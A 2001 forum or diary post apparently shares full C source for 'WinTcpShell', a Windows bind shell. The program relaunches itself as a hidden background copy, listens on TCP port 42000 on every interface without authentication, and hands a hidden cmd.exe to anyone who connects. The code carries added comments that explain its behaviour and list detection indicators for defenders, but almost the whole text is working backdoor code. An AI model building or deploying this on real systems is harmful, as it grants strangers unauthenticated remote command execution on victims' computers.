2 Apr 2001 zophyx   » (Observer)

 I couldn't find any Windows(TM) code that listened on a
 port and spawned a shell, so I wrote some.

/*
 * WinTcpShell
 * tcpshell.c
 *
 * cl tcpshell.c /link wsock32.lib Ws2_32.lib
 *
 * This code runs a copy of itself and then exits.
 * The copy that is left running in memory opens a port and
 * waits for a connection.
 * When a connection is made it runs cmd.exe with stdin,
 * stdout and stderr piped in and out of the socket.
 * This code is released into the public domain
 * with no restrictions other than Microsoft's copyrights
 * and patents and trademarks and criminal liabilities
 * that might apply.
 */

#include <sys\types.h> #include <winsock2.h> #include <stdio.h> #include <stdlib.h> #include <errno.h> #include <io.h>

/* Backlog passed to listen(): the Winsock "as many as possible" value. */
#define LISTENQ SOMAXCONN

/*
 * File-scope state shared by the whole program (everything lives in main).
 *
 * lsocket / csocket hold the listening and accepted sockets.  They are
 * declared int even though WSASocket()/accept() return SOCKET and main
 * compares them against INVALID_SOCKET; lsocket == 0 doubles as the
 * "listener not created yet" flag.
 * laddr is the local bind address, caddr receives the peer address from
 * accept() and is otherwise never read.
 */
WSADATA WSAData;
int status;
int lsocket = 0;
int csocket = 0;
struct sockaddr_in laddr;
struct sockaddr_in caddr;

/* Address length in/out parameter for bind()/accept(). */
int len;

/*
 * Process-creation state and the two fixed command strings.
 *
 * spawn_cmd    - absolute path of the shell that is attached to each
 *                accepted connection; hard-coded to one drive/directory.
 * copy_command - relaunches this same executable, by relative path, with
 *                one extra argument so the child takes the argc > 1 path
 *                in main.
 *
 * Defender note: both strings are stored verbatim in the binary, so the
 * literal cmd.exe path and the ".\tcpshell.exe copy" command line are
 * usable as static indicators for this sample.
 */
STARTUPINFO si;
PROCESS_INFORMATION pi;
char spawn_cmd[] = "d:\\winnt\\system32\\cmd.exe";
char copy_command[] = ".\\tcpshell.exe copy";

/*
 * Entry point.  Behaviour depends only on argc (argv is never read):
 *
 *   argc == 1  relaunch this executable as copy_command (".\tcpshell.exe
 *              copy") with a hidden window, then exit, leaving the copy
 *              resident;
 *   argc  > 1  bind TCP port 42000 on every local interface and, for each
 *              accepted connection, start spawn_cmd (cmd.exe) with
 *              stdin/stdout/stderr all set to the connected socket, then
 *              loop back to accept() for the next client.
 *
 * Nothing here authenticates or filters the peer: caddr is filled in by
 * accept() and never inspected, and there is no credential check before
 * cmd.exe is attached to the connection.
 *
 * Defender notes, all visible in the code below: a new listener on
 * TCP/42000 bound to INADDR_ANY; a process whose image name is
 * tcpshell.exe started with exactly one extra argument; and cmd.exe
 * children created with STARTF_USESTDHANDLES where all three standard
 * handles are the same inherited socket and the window is SW_HIDE.
 * Host-based inbound filtering of unexpected listening ports and
 * alerting on cmd.exe whose standard handles are sockets both cover
 * this pattern.
 *
 * Returns 10 on socket()/listen() failure; otherwise exits via exit()
 * or abort() and never returns normally (the while loop has no break).
 */
int main(int argc, char *argv[]) {

    /* Prints the argument count; the text is a leftover debug banner. */
    printf("%d\nOh boy are we having fun now!\n", argc);

    /* Winsock 2.0 start-up.  Failure is reported with perror(), which
       reads errno rather than WSAGetLastError(); only the bind path
       below uses the Winsock error code. */
    if ((status = WSAStartup(MAKEWORD(2, 0), &WSAData)) != 0) {
        perror("WSAStartup() error");
        exit(1);
    }

    while (1) {

        if (argc > 1) {

            /* lsocket is a zero-initialised global, so the listener is
               created once on the first iteration and reused afterwards. */
            if (!lsocket) {

                if ( (lsocket = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_IP, NULL, 0, 0)) == INVALID_SOCKET) {
                    printf("socket error: %0x", WSAGetLastError());
                    return (10);
                }

                /* Bind to INADDR_ANY: reachable on every local address,
                   not just loopback.  The port is fixed at 42000. */
                len = sizeof(laddr);
                memset(&laddr, 0, len);
                laddr.sin_addr.s_addr = htonl(INADDR_ANY);
                laddr.sin_family = AF_INET;
                laddr.sin_port = htons(42000);
                if ( (bind (lsocket, (const struct sockaddr *) &laddr, len))) {
                    status = WSAGetLastError();
                    printf("bind error: %d\n", status);
                    exit(1);
                }

                if (listen(lsocket, LISTENQ)) {
                    perror("listen error");
                    return (10);
                }

            }

            /* Block for the next client.  caddr is passed as
               struct sockaddr_in * without a cast; an accept() failure
               aborts the whole process rather than retrying. */
            len = sizeof(caddr);
            if ((csocket = accept(lsocket, &caddr, &len)) == INVALID_SOCKET) {
                perror("socket accept");
                abort();
            }

            /* Only the listener path seeds si from the current process;
               the argc == 1 path below uses the zero-initialised global
               (including si.cb == 0 -- presumably tolerated by
               CreateProcess, not verified here). */
            GetStartupInfo(&si);
        } else {
            /* Relaunch path: no socket exists, so the standard handles
               below are set to the literal 2.  NOTE(review): looks like
               this was meant as a CRT descriptor for stderr rather than a
               Win32 HANDLE -- confirm. */
            csocket = 2;
        }

        /* Hand the socket to the child as all three standard handles and
           hide its window.  csocket is an int being stored into HANDLE
           fields; the code relies on a SOCKET being usable as a HANDLE. */
        si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
        si.wShowWindow = SW_HIDE;
        si.hStdOutput = csocket;
        si.hStdError = csocket;
        si.hStdInput = csocket;

        /* argc == 1: spawn the resident copy of this program (argument
           "copy" makes the child take the argc > 1 branch).  Handles are
           inherited (bInheritHandles == TRUE) and a new console is
           requested; combined with SW_HIDE the child has no visible
           window. */
        if (argc == 1) {
            if (!CreateProcess (NULL, copy_command, NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi)) {
                printf("error in CreateProcess copy_command");
                exit(1);
            }
        }

        /* argc > 1: spawn cmd.exe for the client just accepted.  The
           inherited socket becomes the shell's stdin/stdout/stderr.
           The accepted socket is never closed in this process, and pi's
           handles are never closed either. */
        if (argc > 1) {
            if (!CreateProcess (spawn_cmd, NULL, NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi)) {
                printf("error in CreateProcess spawn_cmd");
                exit(1);
            }
        }

        /* The launcher exits as soon as the copy is running; the copy
           itself stays in the loop and keeps accepting connections. */
        if (argc == 1) {
            exit(0);
        }

    }
}
